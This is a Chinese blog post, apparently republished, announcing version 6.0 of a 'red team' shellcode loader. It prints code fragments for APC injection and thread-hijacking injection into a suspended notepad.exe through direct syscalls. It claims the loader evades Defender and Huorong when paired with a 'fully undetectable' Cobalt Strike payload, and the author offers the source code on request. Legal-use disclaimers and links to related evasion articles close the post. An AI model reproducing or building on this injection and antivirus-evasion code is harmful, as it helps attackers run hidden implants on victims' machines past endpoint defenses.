文章总结： 本文介绍红队加载器LoaderV6.0的更新内容，新增常规APC注入和线程劫持注入两种加载方式，移除部分加密功能并优化UI。技术细节展示通过创建挂起进程和修改寄存器实现内存注入，测试显示在Windows11环境下可规避Defender和火绒检测。作者强调该工具需在合法授权下使用，目前存在SW4环境兼容性问题，建议作为学习参考。 综合评分： 75 文章分类： 红队,渗透测试,恶意软件,安全工具,漏洞分析

[更新]红队加载器LoaderV6.0

原创

陆安予 陆安予

白帽子安全笔记2.0

2026年4月8日 14:49 江苏

这是一个具有高级规避功能的有效载荷加载器。

一、新增内容

1.新增了2种加载方式：在之前的SW4下额外补充了常规APC注入、常规线程劫持注入。 2.移除了2种普通加密方式 3.Bug修复和UI优化

UI界面

二、技术细节

1. APC注入

之前的一种加载方式是当前进程，采用的是NtCreateThreadEx。如选择这个APC将使用经典的APC注入，即创建一个挂起的进程notepad.exe，远程分配内存并使用APC执行。（也就是说上线是notepad++）

CreateProcessA(NULL, (LPSTR)"c:\\windows\\system32\\notepad.exe", NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
..
SW4_NtAllocateVirtualMemory(pi.hProcess, &remoteMem, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
...
SW4_NtQueueApcThread(pi.hThread, (PPS_APC_ROUTINE)remoteMem, NULL, NULL, NULL);

2. ThreadHijacking（线程劫持）注入

这个操作和刚才的不同点不在操作内存上，而在执行上，它不使用APC执行，而是修改 CPU 寄存器来执行。内存方面仍使用NtAllocateVirtualMemory进行。

CONTEXT ctx = { .ContextFlags = CONTEXT_CONTROL };
SW4_NtGetContextThread(pi.hThread, &ctx);
ctx.Rip = (DWORD64)remoteMem;
SW4_NtSetContextThread(pi.hThread, &ctx);
SW4_NtResumeThread(pi.hThread, NULL);

三、检测情况

测试情况如下： 载荷：完全无法检测的payload_x64.bin 截图: ScreenshotBOF 系统：Windows-11-x64-25H2 时间：2026年4月8日

Defender

huorong6

该工具是顶级武器-完全无法检测的cobalt strike项目的附赠内容，由于该载荷无特征才显得强大，使用其它Cobalt Strike可能无法发挥其全部作用如内存规避。

遗留问题： 1.由于SW4目前还有许多Bug，使用SW4可能在某些环境下无法正常运行如Nod32。另外部分API无法替换，部分高级功能无法使用如堆栈欺骗。 2.就当玩具玩，没有环境测试高级效果不清楚，如需要源代码也可以找我拿，可以学习下。

网络安全 #红队训练

四、免责声明

本文涉及方案仅限合法授权的安全研究、渗透测试用途，使用者须确保符合《网络安全法》及相关法规。具体条款如下：

• • 仅可用于已获得书面授权的目标系统测试；
• • 遵守法律法规，不得用于侵犯他人隐私或数据窃取；

本人不承担因用户滥用本软件导致的任何后果。使用即视为同意并接受上述条款。

推荐阅读

• • [更新]红队加载器LoaderV5
• • [更新]红队加载器LoaderV4
• • 攻防必备，DLL代理自动化生成
• • 攻防必备，DLL侧载（白加黑）自动化生成
• • 采用黑白名单匹配进行反沙箱
• • [版本更新]Cobalt Strike基础部署手册&高级白加黑&高级lnk快捷方式新技术
• • [0day]新挖掘到一套高级LNK快捷方式
• • 高级LNK快捷方式自动维持权限与进程注入
• • DLL侧载和DLL代理

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：白帽子安全笔记2.0 陆安予 陆安予《[更新]红队加载器LoaderV6.0》